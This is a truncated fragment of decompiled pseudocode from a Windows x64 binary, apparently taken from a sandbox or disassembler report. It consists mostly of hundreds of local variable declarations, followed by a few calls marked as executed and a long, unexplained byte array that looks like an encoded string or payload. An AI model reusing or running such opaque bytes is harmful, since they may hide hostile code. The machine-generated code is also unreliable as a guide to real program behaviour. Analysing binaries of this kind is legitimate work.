				char _v992;
				char _v993;
				char _v994;
				char _v995;
				char _v996;
				char _v997;
				char _v998;
				char _v999;
				char _v1000;
				char _v1001;
				char _v1002;
				char _v1003;
				char _v1004;
				char _v1005;
				char _v1006;
				char _v1007;
				char _v1008;
				char _v1009;
				char _v1010;
				char _v1011;
				char _v1012;
				char _v1013;
				char _v1014;
				char _v1015;
				char _v1016;
				char _v1017;
				char _v1018;
				char _v1019;
				char _v1020;
				char _v1021;
				char _v1022;
				char _v1023;
				char _v1024;
				char _v1025;
				char _v1026;
				char _v1027;
				char _v1028;
				char _v1029;
				char _v1030;
				char _v1031;
				char _v1032;
				char _v1033;
				char _v1034;
				char _v1035;
				char _v1036;
				char _v1037;
				char _v1038;
				char _v1039;
				char _v1040;
				char _v1041;
				char _v1042;
				char _v1043;
				char _v1044;
				char _v1045;
				char _v1046;
				char _v1047;
				char _v1048;
				char _v1049;
				char _v1050;
				char _v1051;
				char _v1052;
				char _v1053;
				char _v1054;
				char _v1055;
				char _v1056;
				char _v1057;
				char _v1058;
				char _v1059;
				char _v1060;
				char _v1061;
				char _v1062;
				char _v1063;
				char _v1064;
				char _v1065;
				char _v1066;
				char _v1067;
				char _v1068;
				char _v1069;
				char _v1070;
				char _v1071;
				char _v1072;
				char _v1073;
				char _v1074;
				char _v1075;
				char _v1076;
				char _v1077;
				char _v1078;
				char _v1079;
				char _v1080;
				char _v1081;
				char _v1082;
				char _v1083;
				char _v1084;
				char _v1085;
				char _v1086;
				char _v1087;
				char _v1088;
				char _v1089;
				char _v1090;
				char _v1091;
				char _v1092;
				char _v1093;
				char _v1094;
				char _v1095;
				char _v1096;
				char _v1097;
				char _v1098;
				char _v1099;
				char _v1100;
				char _v1101;
				char _v1102;
				char _v1103;
				char _v1104;
				char _v1105;
				char _v1106;
				char _v1107;
				char _v1108;
				char _v1109;
				char _v1110;
				char _v1111;
				char _v1112;
				char _v1113;
				char _v1114;
				char _v1115;
				char _v1116;
				char _v1117;
				char _v1118;
				char _v1119;
				char _v1120;
				char _v1121;
				char _v1122;
				char _v1123;
				char _v1124;
				char _v1125;
				char _v1126;
				char _v1127;
				char _v1128;
				char _v1129;
				char _v1130;
				char _v1131;
				char _v1132;
				char _v1133;
				char _v1134;
				char _v1135;
				char _v1136;
				char _v1137;
				char _v1138;
				char _v1139;
				char _v1140;
				char _v1141;
				char _v1142;
				char _v1143;
				char _v1144;
				char _v1145;
				char _v1146;
				char _v1147;
				char _v1148;
				char _v1149;
				char _v1150;
				char _v1151;
				char _v1152;
				char _v1153;
				char _v1154;
				char _v1155;
				char _v1156;
				char _v1157;
				char _v1158;
				char _v1159;
				char _v1160;
				char _v1161;
				char _v1162;
				char _v1163;
				char _v1164;
				char _v1165;
				char _v1166;
				char _v1167;
				char _v1168;
				char _v1169;
				char _v1170;
				char _v1171;
				char _v1172;
				char _v1173;
				char _v1174;
				char _v1175;
				char _v1176;
				char _v1177;
				char _v1178;
				char _v1179;
				char _v1180;
				char _v1181;
				char _v1182;
				char _v1183;
				char _v1184;
				char _v1185;
				char _v1186;
				char _v1187;
				char _v1188;
				char _v1189;
				char _v1190;
				char _v1191;
				char _v1192;
				char _v1193;
				char _v1194;
				char _v1195;
				char _v1196;
				char _v1197;
				char _v1198;
				char _v1199;
				char _v1200;
				char _v1201;
				char _v1202;
				char _v1203;
				char _v1204;
				char _v1205;
				char _v1206;
				char _v1207;
				char _v1208;
				char _v1209;
				char _v1210;
				char _v1211;
				char _v1212;
				char _v1213;
				char _v1214;
				char _v1215;
				char _v1216;
				char _v1217;
				char _v1218;
				char _v1219;
				char _v1220;
				char _v1221;
				char _v1222;
				char _v1223;
				char _v1224;
				char _v1225;
				char _v1226;
				char _v1227;
				char _v1228;
				char _v1229;
				char _v1230;
				char _v1231;
				char _v1232;
				char _v1233;
				char _v1234;
				char _v1235;
				char _v1236;
				char _v1237;
				char _v1238;
				char _v1239;
				char _v1240;
				char _v1241;
				char _v1242;
				char _v1243;
				char _v1244;
				char _v1245;
				char _v1246;
				char _v1247;
				char _v1248;
				char _v1249;
				char _v1250;
				char _v1251;
				char _v1252;
				char _v1253;
				char _v1254;
				char _v1255;
				char _v1256;
				char _v1257;
				char _v1258;
				char _v1259;
				char _v1260;
				char _v1261;
				char _v1262;
				char _v1263;
				char _v1264;
				char _v1265;
				char _v1266;
				char _v1267;
				char _v1268;
				char _v1269;
				char _v1270;
				char _v1271;
				char _v1272;
				char _v1273;
				char _v1274;
				char _v1275;
				char _v1276;
				char _v1277;
				char _v1278;
				char _v1279;
				char _v1280;
				char _v1281;
				char _v1282;
				char _v1283;
				char _v1284;
				char _v1285;
				char _v1286;
				char _v1287;
				char _v1288;
				char _v1289;
				char _v1290;
				char _v1291;
				char _v1292;
				char _v1293;
				char _v1294;
				char _v1295;
				char _v1296;
				char _v1297;
				char _v1298;
				char _v1299;
				char _v1300;
				char _v1301;
				char _v1302;
				char _v1303;
				char _v1304;
				char _v1305;
				char _v1306;
				char _v1307;
				char _v1308;
				char _v1309;
				char _v1310;
				char _v1311;
				char _v1312;
				char _v1313;
				char _v1314;
				char _v1315;
				char _v1316;
				char _v1317;
				char _v1318;
				char _v1319;
				char _v1320;
				char _v1321;
				char _v1322;
				char _v1323;
				char _v1324;
				char _v1325;
				char _v1326;
				char _v1327;
				char _v1328;
				char _v1329;
				char _v1330;
				char _v1331;
				char _v1332;
				char _v1333;
				char _v1334;
				char _v1335;
				char _v1336;
				char _v1337;
				char _v1338;
				char _v1339;
				char _v1340;
				char _v1341;
				char _v1342;
				char _v1343;
				char _v1344;
				char _v1345;
				char _v1346;
				char _v1347;
				char _v1348;
				char _v1349;
				char _v1350;
				char _v1351;
				char _v1352;
				char _v1353;
				char _v1354;
				char _v1355;
				char _v1356;
				char _v1357;
				char _v1358;
				char _v1359;
				char _v1360;
				char _v1361;
				char _v1362;
				char _v1363;
				char _v1364;
				char _v1365;
				char _v1366;
				char _v1367;
				char _v1368;
				char _v1369;
				char _v1370;
				char _v1371;
				char _v1372;
				char _v1373;
				char _v1374;
				char _v1375;
				char _v1376;
				char _v1377;
				char _v1378;
				char _v1379;
				char _v1380;
				char _v1381;
				char _v1382;
				char _v1383;
				char _v1384;
				char _v1385;
				char _v1386;
				char _v1387;
				char _v1388;
				char _v1389;
				char _v1390;
				char _v1391;
				char _v1392;
				char _v1393;
				char _v1394;
				char _v1395;
				char _v1396;
				char _v1397;
				char _v1398;
				char _v1399;
				char _v1400;
				char _v1401;
				char _v1402;
				char _v1403;
				char _v1404;
				char _v1405;
				char _v1406;
				char _v1407;
				char _v1408;
				char _v1409;
				char _v1410;
				char _v1411;
				char _v1412;
				char _v1413;
				char _v1414;
				char _v1415;
				char _v1416;
				char _v1417;
				char _v1418;
				char _v1419;
				char _v1420;
				char _v1421;
				char _v1422;
				char _v1423;
				char _v1424;
				char _v1425;
				char _v1426;
				char _v1427;
				char _v1428;
				char _v1429;
				char _v1430;
				char _v1431;
				char _v1432;
				char _v1433;
				char _v1434;
				char _v1435;
				char _v1436;
				char _v1437;
				char _v1438;
				char _v1439;
				char _v1440;
				char _v1441;
				char _v1442;
				char _v1443;
				char _v1444;
				char _v1445;
				char _v1446;
				char _v1447;
				char _v1448;
				char _v1449;
				char _v1450;
				char _v1451;
				char _v1452;
				char _v1453;
				char _v1454;
				char _v1455;
				char _v1456;
				char _v1457;
				char _v1458;
				char _v1459;
				char _v1460;
				char _v1461;
				char _v1462;
				char _v1463;
				char _v1464;
				char _v1465;
				char _v1466;
				char _v1467;
				char _v1468;
				char _v1469;
				char _v1470;
				char _v1471;
				char _v1472;
				char _v1473;
				char _v1474;
				char _v1475;
				char _v1476;
				char _v1477;
				char _v1478;
				char _v1479;
				char _v1480;
				char _v1481;
				char _v1482;
				char _v1483;
				char _v1484;
				char _v1485;
				char _v1486;
				char _v1487;
				char _v1488;
				char _v1489;
				char _v1490;
				char _v1491;
				char _v1492;
				char _v1493;
				char _v1494;
				char _v1495;
				char _v1496;
				char _v1497;
				char _v1498;
				char _v1499;
				char _v1500;
				char _v1501;
				char _v1502;
				char _v1503;
				char _v1504;
				char _v1505;
				char _v1506;
				char _v1507;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1513;
				char _v1514;
				char _v1515;
				char _v1516;
				char _v1517;
				char _v1518;
				char _v1519;
				char _v1520;
				char _v1521;
				char _v1522;
				char _v1523;
				char _v1524;
				char _v1525;
				char _v1526;
				char _v1527;
				char _v1528;
				char _v1529;
				char _v1530;
				char _v1531;
				char _v1532;
				char _v1533;
				char _v1534;
				char _v1535;
				char _v1536;
				char _v1537;
				char _v1538;
				char _v1539;
				char _v1540;
				char _v1541;
				char _v1542;
				char _v1543;
				char _v1544;
				char _v1545;
				char _v1546;
				char _v1547;
				char _v1548;
				char _v1549;
				char _v1550;
				char _v1551;
				char _v1552;
				char _v1553;
				char _v1554;
				char _v1555;
				char _v1556;
				char _v1557;
				char _v1558;
				char _v1559;
				char _v1560;
				char _v1561;
				char _v1562;
				char _v1563;
				char _v1564;
				char _v1565;
				char _v1566;
				char _v1567;
				char _v1568;
				char _v1569;
				char _v1570;
				char _v1571;
				char _v1572;
				char _v1573;
				char _v1574;
				char _v1575;
				char _v1576;
				char _v1577;
				char _v1578;
				char _v1579;
				char _v1580;
				char _v1581;
				char _v1582;
				char _v1583;
				char _v1584;
				char _v1585;
				char _v1586;
				char _v1587;
				char _v1588;
				char _v1589;
				char _v1590;
				char _v1591;
				char _v1592;
				char _v1593;
				char _v1594;
				char _v1595;
				char _v1596;
				char _v1597;
				char _v1598;
				char _v1599;
				char _v1600;
				char _v1601;
				char _v1602;
				char _v1603;
				char _v1604;
				char _v1605;
				char _v1606;
				char _v1607;
				char _v1608;
				char _v1609;
				char _v1610;
				char _v1611;
				char _v1612;
				char _v1613;
				char _v1614;
				char _v1615;
				char _v1616;
				char _v1617;
				char _v1618;
				char _v1619;
				char _v1620;
				char _v1621;
				char _v1622;
				char _v1623;
				char _v1624;
				char _v1625;
				char _v1626;
				char _v1627;
				char _v1628;
				char _v1629;
				char _v1630;
				char _v1631;
				char _v1632;
				char _v1633;
				char _v1634;
				char _v1635;
				char _v1636;
				char _v1637;
				char _v1638;
				char _v1639;
				char _v1640;
				char _v1641;
				char _v1642;
				char _v1643;
				char _v1644;
				char _v1645;
				char _v1646;
				char _v1647;
				char _v1648;
				char _v1649;
				char _v1650;
				char _v1651;
				char _v1652;
				char _v1653;
				char _v1654;
				char _v1655;
				char _v1656;
				char _v1657;
				char _v1658;
				char _v1659;
				char _v1660;
				char _v1661;
				char _v1662;
				char _v1663;
				char _v1664;
				char _v1665;
				char _v1666;
				char _v1667;
				char _v1668;
				char _v1669;
				char _v1670;
				char _v1671;
				char _v1672;
				char _v1673;
				char _v1674;
				char _v1675;
				char _v1676;
				char _v1677;
				char _v1678;
				char _v1679;
				char _v1680;
				char _v1681;
				char _v1682;
				char _v1683;
				char _v1684;
				char _v1685;
				char _v1686;
				char _v1687;
				char _v1688;
				char _v1689;
				char _v1690;
				char _v1691;
				char _v1692;
				char _v1693;
				char _v1694;
				char _v1695;
				char _v1696;
				char _v1697;
				char _v1698;
				char _v1699;
				char _v1700;
				char _v1701;
				char _v1702;
				char _v1703;
				char _v1704;
				char _v1705;
				char _v1706;
				char _v1707;
				char _v1708;
				char _v1709;
				char _v1710;
				char _v1711;
				char _v1712;
				char _v1713;
				char _v1714;
				char _v1715;
				char _v1716;
				char _v1717;
				char _v1718;
				char _v1719;
				char _v1720;
				char _v1721;
				char _v1722;
				char _v1723;
				char _v1724;
				char _v1725;
				char _v1726;
				char _v1727;
				char _v1728;
				char _v1729;
				char _v1730;
				char _v1731;
				char _v1732;
				char _v1733;
				char _v1734;
				char _v1735;
				char _v1736;
				char _v1737;
				char _v1738;
				char _v1739;
				char _v1740;
				char _v1741;
				char _v1742;
				char _v1743;
				char _v1744;
				char _v1745;
				char _v1746;
				char _v1747;
				char _v1748;
				char _v1749;
				char _v1750;
				char _v1751;
				char _v1752;
				char _v1753;
				char _v1754;
				char _v1755;
				char _v1756;
				char _v1757;
				char _v1758;
				char _v1759;
				char _v1760;
				char _v1761;
				char _v1762;
				char _v1763;
				char _v1764;
				char _v1765;
				char _v1766;
				char _v1767;
				char _v1768;
				char _v1769;
				char _v1770;
				char _v1771;
				char _v1772;
				char _v1773;
				char _v1774;
				char _v1775;
				char _v1776;
				char _v1777;
				char _v1778;
				char _v1779;
				char _v1780;
				char _v1781;
				char _v1782;
				char _v1783;
				char _v1784;
				char _v1785;
				char _v1786;
				char _v1787;
				char _v1788;
				char _v1789;
				char _v1790;
				char _v1791;
				char _v1792;
				char _v1793;
				char _v1794;
				char _v1795;
				char _v1796;
				char _v1797;
				char _v1798;
				char _v1799;
				char _v1800;
				char _v1801;
				char _v1802;
				char _v1803;
				char _v1804;
				char _v1805;
				char _v1806;
				char _v1807;
				char _v1808;
				char _v1809;
				char _v1810;
				char _v1811;
				char _v1812;
				char _v1813;
				char _v1814;
				char _v1815;
				char _v1816;
				char _v1817;
				char _v1818;
				char _v1819;
				char _v1820;
				char _v1821;
				char _v1822;
				char _v1823;
				char _v1824;
				char _v1825;
				char _v1826;
				char _v1827;
				char _v1828;
				char _v1829;
				char _v1830;
				char _v1831;
				char _v1832;
				char _v1833;
				char _v1834;
				char _v1835;
				char _v1836;
				char _v1837;
				char _v1838;
				char _v1839;
				char _v1840;
				char _v1841;
				char _v1842;
				char _v1843;
				char _v1844;
				char _v1845;
				char _v1846;
				char _v1847;
				char _v1848;
				char _v1849;
				char _v1850;
				char _v1851;
				char _v1852;
				char _v1853;
				char _v1854;
				char _v1855;
				char _v1856;
				char _v1857;
				char _v1858;
				char _v1859;
				char _v1860;
				char _v1861;
				char _v1862;
				char _v1863;
				char _v1864;
				char _v1865;
				char _v1866;
				char _v1867;
				char _v1868;
				char _v1869;
				char _v1870;
				char _v1871;
				char _v1872;
				char _v1873;
				char _v1874;
				char _v1875;
				char _v1876;
				char _v1877;
				char _v1878;
				char _v1879;
				char _v1880;
				char _v1881;
				char _v1882;
				char _v1883;
				char _v1884;
				char _v1885;
				char _v1886;
				char _v1887;
				char _v1888;
				char _v1889;
				char _v1890;
				char _v1891;
				char _v1892;
				char _v1893;
				char _v1894;
				char _v1895;
				char _v1896;
				char _v1897;
				char _v1898;
				char _v1899;
				char _v1900;
				char _v1901;
				char _v1902;
				char _v1903;
				char _v1904;
				char _v1905;
				char _v1906;
				char _v1907;
				char _v1908;
				char _v1909;
				char _v1910;
				char _v1911;
				char _v1912;
				char _v1913;
				char _v1914;
				char _v1915;
				char _v1916;
				char _v1917;
				char _v1918;
				char _v1919;
				char _v1920;
				char _v1921;
				char _v1922;
				char _v1923;
				char _v1924;
				char _v1925;
				char _v1926;
				char _v1927;
				char _v1928;
				char _v1929;
				char _v1930;
				char _v1931;
				char _v1932;
				char _v1933;
				char _v1934;
				char _v1935;
				char _v1936;
				char _v1937;
				char _v1938;
				char _v1939;
				char _v1940;
				char _v1941;
				char _v1942;
				char _v1943;
				char _v1944;
				char _v1945;
				char _v1946;
				char _v1947;
				char _v1948;
				char _v1949;
				char _v1950;
				char _v1951;
				char _v1952;
				char _v1953;
				char _v1954;
				char _v1955;
				char _v1956;
				char _v1957;
				char _v1958;
				char _v1959;
				char _v1960;
				char _v1961;
				char _v1962;
				char _v1963;
				char _v1964;
				char _v1965;
				char _v1966;
				char _v1967;
				char _v1968;
				char _v1969;
				char _v1970;
				char _v1971;
				char _v1972;
				char _v1973;
				char _v1974;
				char _v1975;
				char _v1976;
				char _v1977;
				char _v1978;
				char _v1979;
				char _v1980;
				char _v1981;
				char _v1982;
				char _v1983;
				char _v1984;
				char _v1985;
				char _v1986;
				char _v1987;
				char _v1988;
				char _v1989;
				char _v1990;
				char _v1991;
				char _v1992;
				char _v1993;
				char _v1994;
				char _v1995;
				char _v1996;
				char _v1997;
				char _v1998;
				char _v1999;
				char _v2000;
				char _v2001;
				char _v2002;
				char _v2003;
				char _v2004;
				char _v2005;
				char _v2006;
				char _v2007;
				char _v2008;
				char _v2009;
				char _v2010;
				char _v2011;
				char _v2012;
				char _v2013;
				char _v2014;
				char _v2015;
				char _v2016;
				char _v2017;
				char _v2018;
				char _v2019;
				char _v2020;
				char _v2021;
				char _v2022;
				char _v2023;
				char _v2024;
				char _v2025;
				char _v2026;
				char _v2027;
				char _v2028;
				char _v2029;
				char _v2030;
				char _v2031;
				char _v2032;
				char _v2033;
				char _v2034;
				char _v2035;
				char _v2036;
				char _v2037;
				char _v2038;
				char _v2039;
				char _v2040;
				char _v2041;
				char _v2042;
				char _v2043;
				char _v2044;
				char _v2045;
				char _v2046;
				char _v2047;
				char _v2048;
				char _v2049;
				char _v2050;
				char _v2051;
				char _v2052;
				char _v2053;
				char _v2054;
				char _v2055;
				char _v2056;
				char _v2057;
				char _v2058;
				char _v2059;
				char _v2060;
				char _v2061;
				char _v2062;
				char _v2063;
				char _v2064;
				char _v2065;
				char _v2066;
				char _v2067;
				char _v2068;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v2073;
				char _v2074;
				char _v2075;
				char _v2076;
				char _v2077;
				char _v2078;
				char _v2079;
				char _v2080;
				char _v2081;
				char _v2082;
				char _v2083;
				char _v2084;
				char _v2085;
				char _v2086;
				char _v2087;
				char _v2088;
				char _v2089;
				char _v2090;
				char _v2091;
				char _v2092;
				char _v2093;
				char _v2094;
				char _v2095;
				char _v2096;
				char _v2097;
				char _v2098;
				char _v2099;
				char _v2100;
				char _v2101;
				char _v2102;
				char _v2103;
				char _v2104;
				char _v2105;
				char _v2106;
				char _v2107;
				char _v2108;
				char _v2109;
				char _v2110;
				char _v2111;
				char _v2112;
				char _v2113;
				char _v2114;
				char _v2115;
				char _v2116;
				char _v2117;
				char _v2118;
				char _v2119;
				char _v2120;
				char _v2121;
				char _v2122;
				char _v2123;
				char _v2124;
				char _v2125;
				char _v2126;
				char _v2127;
				char _v2128;
				char _v2129;
				char _v2130;
				char _v2131;
				char _v2132;
				char _v2133;
				char _v2134;
				char _v2135;
				char _v2136;
				char _v2137;
				char _v2138;
				char _v2139;
				char _v2140;
				char _v2141;
				char _v2142;
				char _v2143;
				char _v2144;
				char _v2145;
				char _v2146;
				char _v2147;
				char _v2148;
				char _v2149;
				char _v2150;
				char _v2151;
				char _v2152;
				char _v2153;
				char _v2154;
				char _v2155;
				char _v2156;
				char _v2157;
				char _v2158;
				char _v2159;
				char _v2160;
				char _v2161;
				char _v2162;
				char _v2163;
				char _v2164;
				char _v2165;
				char _v2166;
				char _v2167;
				char _v2168;
				char _v2169;
				char _v2170;
				char _v2171;
				char _v2172;
				char _v2173;
				char _v2174;
				char _v2175;
				char _v2176;
				char _v2177;
				char _v2178;
				char _v2179;
				char _v2180;
				char _v2181;
				char _v2182;
				char _v2183;
				char _v2184;
				char _v2185;
				char _v2186;
				char _v2187;
				char _v2188;
				char _v2189;
				char _v2190;
				char _v2191;
				char _v2192;
				char _v2193;
				char _v2194;
				char _v2195;
				char _v2196;
				char _v2197;
				char _v2198;
				char _v2199;
				char _v2200;
				char _v2201;
				char _v2202;
				char _v2203;
				char _v2204;
				char _v2205;
				char _v2206;
				char _v2207;
				char _v2208;
				char _v2209;
				char _v2210;
				char _v2211;
				char _v2212;
				char _v2213;
				char _v2214;
				char _v2215;
				char _v2216;
				char _v2217;
				char _v2218;
				char _v2219;
				char _v2220;
				char _v2221;
				char _v2222;
				char _v2223;
				char _v2224;
				char _v2225;
				char _v2226;
				char _v2227;
				char _v2228;
				char _v2229;
				char _v2230;
				char _v2231;
				char _v2232;
				char _v2233;
				char _v2234;
				char _v2235;
				char _v2236;
				char _v2237;
				char _v2238;
				char _v2239;
				char _v2240;
				char _v2241;
				char _v2242;
				char _v2243;
				char _v2244;
				char _v2245;
				char _v2246;
				char _v2247;
				char _v2248;
				char _v2249;
				char _v2250;
				char _v2251;
				char _v2252;
				char _v2253;
				char _v2254;
				char _v2255;
				char _v2256;
				char _v2257;
				char _v2258;
				char _v2259;
				char _v2260;
				char _v2261;
				char _v2262;
				char _v2263;
				char _v2264;
				char _v2265;
				char _v2266;
				char _v2267;
				char _v2268;
				char _v2269;
				char _v2270;
				char _v2271;
				char _v2272;
				char _v2273;
				char _v2274;
				char _v2275;
				char _v2276;
				char _v2277;
				char _v2278;
				char _v2279;
				char _v2280;
				char _v2281;
				char _v2282;
				char _v2283;
				char _v2284;
				char _v2285;
				char _v2286;
				char _v2287;
				char _v2288;
				char _v2289;
				char _v2290;
				char _v2291;
				char _v2292;
				char _v2293;
				char _v2294;
				char _v2295;
				char _v2296;
				char _v2297;
				char _v2298;
				char _v2299;
				char _v2300;
				char _v2301;
				char _v2302;
				char _v2303;
				char _v2304;
				char _v2305;
				char _v2306;
				char _v2307;
				char _v2308;
				char _v2309;
				char _v2310;
				char _v2311;
				char _v2312;
				char _v2313;
				char _v2314;
				char _v2315;
				char _v2316;
				char _v2317;
				char _v2318;
				char _v2319;
				char _v2320;
				char _v2321;
				char _v2322;
				char _v2323;
				char _v2324;
				char _v2325;
				char _v2326;
				char _v2327;
				char _v2328;
				char _v2329;
				char _v2330;
				char _v2331;
				char _v2332;
				char _v2333;
				char _v2334;
				char _v2335;
				char _v2336;
				char _v2337;
				char _v2338;
				char _v2339;
				char _v2340;
				char _v2341;
				char _v2342;
				char _v2343;
				char _v2344;
				char _v2345;
				char _v2346;
				char _v2347;
				char _v2348;
				char _v2349;
				char _v2350;
				char _v2351;
				char _v2352;
				char _v2353;
				char _v2354;
				char _v2355;
				char _v2356;
				char _v2357;
				char _v2358;
				char _v2359;
				char _v2360;
				char _v2361;
				char _v2362;
				char _v2363;
				char _v2364;
				char _v2365;
				char _v2366;
				char _v2367;
				char _v2368;
				char _v2369;
				char _v2370;
				char _v2371;
				char _v2372;
				char _v2373;
				char _v2374;
				char _v2375;
				char _v2376;
				char _v2377;
				char _v2378;
				char _v2379;
				char _v2380;
				char _v2381;
				char _v2382;
				char _v2383;
				char _v2384;
				char _v2385;
				char _v2386;
				char _v2387;
				char _v2388;
				char _v2389;
				char _v2390;
				char _v2391;
				char _v2392;
				char _v2393;
				char _v2394;
				char _v2395;
				char _v2396;
				char _v2397;
				char _v2398;
				char _v2399;
				char _v2400;
				char _v2401;
				char _v2402;
				char _v2403;
				char _v2404;
				char _v2405;
				char _v2406;
				char _v2407;
				char _v2408;
				char _v2409;
				char _v2410;
				char _v2411;
				char _v2412;
				char _v2413;
				char _v2414;
				char _v2415;
				char _v2416;
				char _v2417;
				char _v2418;
				char _v2419;
				char _v2420;
				char _v2421;
				char _v2422;
				char _v2423;
				char _v2424;
				char _v2425;
				char _v2426;
				char _v2427;
				char _v2428;
				char _v2429;
				char _v2430;
				char _v2431;
				char _v2432;
				char _v2433;
				char _v2434;
				char _v2435;
				char _v2436;
				char _v2437;
				char _v2438;
				char _v2439;
				char _v2440;
				char _v2441;
				char _v2442;
				char _v2443;
				char _v2444;
				char _v2445;
				char _v2446;
				char _v2447;
				char _v2448;
				char _v2449;
				char _v2450;
				char _v2451;
				char _v2452;
				char _v2453;
				char _v2454;
				char _v2455;
				char _v2456;
				char _v2457;
				char _v2458;
				char _v2459;
				char _v2460;
				char _v2461;
				char _v2462;
				char _v2463;
				char _v2464;
				char _v2465;
				char _v2466;
				char _v2467;
				char _v2468;
				char _v2469;
				char _v2470;
				char _v2471;
				char _v2472;
				char _v2473;
				char _v2474;
				char _v2475;
				char _v2476;
				char _v2477;
				char _v2478;
				char _v2479;
				char _v2480;
				char _v2481;
				char _v2482;
				char _v2483;
				char _v2484;
				char _v2485;
				char _v2486;
				char _v2487;
				char _v2488;
				char _v2489;
				char _v2490;
				char _v2491;
				char _v2492;
				char _v2493;
				char _v2494;
				char _v2495;
				char _v2496;
				char _v2497;
				char _v2498;
				char _v2499;
				char _v2500;
				char _v2501;
				char _v2502;
				char _v2503;
				char _v2504;
				char _v2505;
				char _v2506;
				char _v2507;
				char _v2508;
				char _v2509;
				char _v2510;
				char _v2511;
				char _v2512;
				char _v2513;
				char _v2514;
				char _v2515;
				char _v2516;
				char _v2517;
				char _v2518;
				char _v2519;
				char _v2520;
				char _v2521;
				char _v2522;
				char _v2523;
				char _v2524;
				char _v2525;
				char _v2526;
				char _v2527;
				char _v2528;
				char _v2529;
				char _v2530;
				char _v2531;
				char _v2532;
				char _v2533;
				char _v2534;
				char _v2535;
				char _v2536;
				char _v2537;
				char _v2538;
				char _v2539;
				char _v2540;
				char _v2541;
				char _v2542;
				char _v2543;
				char _v2544;
				char _v2545;
				char _v2546;
				char _v2547;
				char _v2548;
				char _v2549;
				char _v2550;
				char _v2551;
				char _v2552;
				char _v2553;
				char _v2554;
				char _v2555;
				char _v2556;
				char _v2557;
				char _v2558;
				char _v2559;
				char _v2560;
				char _v2561;
				char _v2562;
				char _v2563;
				char _v2564;
				char _v2565;
				char _v2566;
				char _v2567;
				char _v2568;
				char _v2569;
				char _v2570;
				char _v2571;
				char _v2572;
				char _v2573;
				char _v2574;
				char _v2575;
				char _v2576;
				char _v2577;
				char _v2578;
				char _v2579;
				char _v2580;
				char _v2581;
				char _v2582;
				char _v2583;
				char _v2584;
				char _v2585;
				char _v2586;
				char _v2587;
				char _v2588;
				char _v2589;
				char _v2590;
				char _v2591;
				char _v2592;
				char _v2593;
				char _v2594;
				char _v2595;
				char _v2596;
				char _v2597;
				char _v2598;
				char _v2599;
				char _v2600;
				char _v2601;
				char _v2602;
				char _v2603;
				char _v2604;
				char _v2605;
				char _v2606;
				char _v2607;
				char _v2608;
				char _v2609;
				char _v2610;
				char _v2611;
				char _v2612;
				char _v2613;
				char _v2614;
				char _v2615;
				char _v2616;
				char _v2617;
				char _v2618;
				char _v2619;
				char _v2620;
				char _v2621;
				char _v2622;
				char _v2623;
				char _v2624;
				char _v2625;
				char _v2626;
				char _v2627;
				char _v2628;
				char _v2629;
				char _v2630;
				char _v2631;
				char _v2632;
				char _v2672;
				char _v2704;
				void* _v2736;
				char _v2752;
				signed long long _v2760;
				long long _v2768;
				char _v2776;
				signed int _v2780;
				intOrPtr _v2784;
				signed long long _v2792;
				signed char _v2796;
				signed char _v2800;
				signed char _v2804;
				signed char _v2808;
				signed int _t2669;
				signed long long _t2714;
				signed long long _t2715;
				long long _t2716;
				signed long long _t2748;

				_t2746 = __rdi;
				_t2703 = __edi;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_t2714 =  *0x146de008; // 0xef3156171c50
				_t2715 = _t2714 ^ _t2748;
				_v24 = _t2715;
				_v2784 = _a16;
				if (_v2784 == 1) goto 0x14673fee;
				goto 0x146793e5;
				_v2796 = 0;
				_v2800 = 0;
				_v2768 = 0;
				_v2792 = 0;
				E00007FFD7FFD146697DC(_a16, __rcx); // executed
				_v2792 = _t2715;
				if (_v2792 == 0) goto 0x14674039;
				r8d = 0x5f5e100;
				E00007FFD7FFD14666920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
				E00007FFD7FFD146693A8(_t2715, __rbx, _v2792, __rsi); // executed
				 *0x146dea20 = 0;
				 *0x146dea14 = 0;
				 *0x146dea24 = 0;
				 *0x146dea18 = 0;
				 *0x146dea1c = 0;
				 *0x146dea10 = 0;
				_v2632 = 0x62;
				_v2631 = 0xfa;
				_v2630 = 0x28;
				_v2629 = 0x18;
				_v2628 = 0x56;
				_v2627 = 0x18;
				_v2626 = 0x3d;
				_v2625 = 0x31;
				_v2624 = 0x39;
				_v2623 = 0x13;
				_v2622 = 0x33;
				_v2621 = 9;
				_v2620 = 5;
				_v2619 = 0x64;
				_v2618 = 0x18;
				_v2617 = 0x2d;
				_v2616 = 0x39;
				_v2615 = 0x32;
				_v2614 = 0xae;
				_v2613 = 0x33;
				_v2612 = 2;
				_v2611 = 0xdc;
				_v2610 = 0xf;
				_v2609 = 0xd9;
				_v2608 = 0x8a;
				_v2607 = 0x2c;
				_v2606 = 0x45;
				_v2605 = 0x26;
				_v2604 = 0x3c;
				_v2603 = 0x60;
				_v2602 = 0x69;
				_v2601 = 0xdb;
				_v2600 = 0x9e;
				_v2599 = 0x2e;
				_v2598 = 0xd5;
				_v2597 = 0x26;
				_v2596 = 0x26;
				_v2595 = 0x30;
				_v2594 = 0x3f;
				_v2593 = 0x22;
				_v2592 = 0xe6;
				_v2591 = 0xce;
				_v2590 = 0x3c;
				_v2589 = 0xe6;
				_v2588 = 0x4c;
				_v2587 = 0xd5;
				_v2586 = 0xb9;
				_v2585 = 0x39;
				_v2584 = 0xef;
				_v2583 = 0xdb;
				_v2582 = 0x81;
				_v2581 = 0x12;
				_v2580 = 0xc4;
				_v2579 = 0xb;
				_v2578 = 0xd7;
				_v2577 = 0x22;
				_v2576 = 0xdb;
				_v2575 = 2;
				_v2574 = 0xb8;
				_v2573 = 0x15;
				_v2572 = 0xa8;
				_v2571 = 2;
				_v2570 = 0x48;
				_v2569 = 0xb;
				_v2568 = 0x36;
				_v2567 = 0xaa;
				_v2566 = 0x3a;
				_v2565 = 0xde;
				_v2564 = 0x30;
				_v2563 = 0xcf;
				_v2562 = 0x15;
				_v2561 = 0xca;
				_v2560 = 0x30;
				_v2559 = 0xcc;
				_v2558 = 0x6b;
				_v2557 = 0xae;
				_v2556 = 0x69;
				_v2555 = 0xd3;
				_v2554 = 0x5a;
				_v2553 = 0xb1;
				_v2552 = 0x27;
				_v2551 = 0xe4;
				_v2550 = 0x28;
				_v2549 = 0xf6;
				_v2548 = 0x19;
				_v2547 = 0xb6;
				_v2546 = 0xf;
				_v2545 = 0x65;
				_v2544 = 0x7b;
				_v2543 = 0xf9;
				_v2542 = 0xa;
